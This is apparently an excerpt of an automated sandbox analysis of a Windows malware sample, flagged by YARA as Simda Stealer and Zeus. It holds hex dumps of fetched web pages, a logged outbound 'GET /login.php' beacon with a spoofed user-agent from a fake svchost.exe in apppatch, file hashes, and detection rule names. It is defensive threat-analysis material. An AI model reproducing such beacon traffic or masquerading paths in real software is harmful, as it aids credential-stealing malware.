2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e Data Ascii: nction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.can
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f Data Ascii: ined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSO
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 Data Ascii: ).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minifi
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f Data Ascii: site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;fo
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d Data Ascii: ]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 Data Ascii: ontent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .ent
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 Data Ascii: sible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	64582	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:15:01 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-11-11 17:15:04 UTC	1090	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:15:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="98.7",amp_style_sanitizer;dur="39.3",amp_tag_and_attribute_sanitizer;dur="53.1",amp_optimizer;dur="43.4" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IgXC5%2FgmcNKoz3cZ%2Fxruf1nNNG0vczf2IMFmqMdUrBuwMsf0ojHasIJTLGDCbfzyHH%2BVCSuthV9BI9eaXthLmOnsyu3TYPd3n%2BjLzk7UTwu2IQFjlsrNtPO8WDFSoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fec04eba94401-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=1597352&cwnd=251&unsent_bytes=0&cid=5258a3b7d38dbd6c&ts=3137&x=0"
2024-11-11 17:15:04 UTC	279	IN	Data Raw: 37 63 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c1c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 Data Ascii: rset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:1
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b Data Ascii: ling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 Data Ascii: 100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-t
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 Data Ascii: html-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;pos
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a Data Ascii: ay:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 Data Ascii: :not(.i-amphtml-layout-container)>,[layout]:not([layout=container]):not(.i-amphtml-element)>,[width][height][heights]:not([layout]):not(.i-amphtml-element)>,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>{display:none}amp-img:not(.i-amph
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d Data Ascii: om:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!im
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f Data Ascii: hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordio
2024-11-11 17:15:04 UTC	1369	IN	Data Raw: 74 61 6e 64 61 72 64 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 6c 79 73 79 76 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 31 32 2f 63 72 6f 70 70 65 64 2d 53 75 6b 73 65 73 2d 46 61 76 69 63 6f 6e 2d 32 37 30 78 32 37 30 2e 70 6e 67 22 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 Data Ascii: tandard"><meta name="msapplication-TileImage" content="https://lysyvan.com/wp-content/uploads/2023/12/cropped-Sukses-Favicon-270x270.png"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async

Target ID:	0
Start time:	12:12:56
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\Bpfz752pYZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bpfz752pYZ.exe"
Imagebase:	0x400000
File size:	1'179'648 bytes
MD5 hash:	A1699B125470C94380386D6C0CF106B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:12:57
Start date:	11/11/2024
Path:	C:\Windows\apppatch\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\apppatch\svchost.exe"
Imagebase:	0x400000
File size:	1'179'648 bytes
MD5 hash:	AA278E2717BFC5593B570B9CC3D1270A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
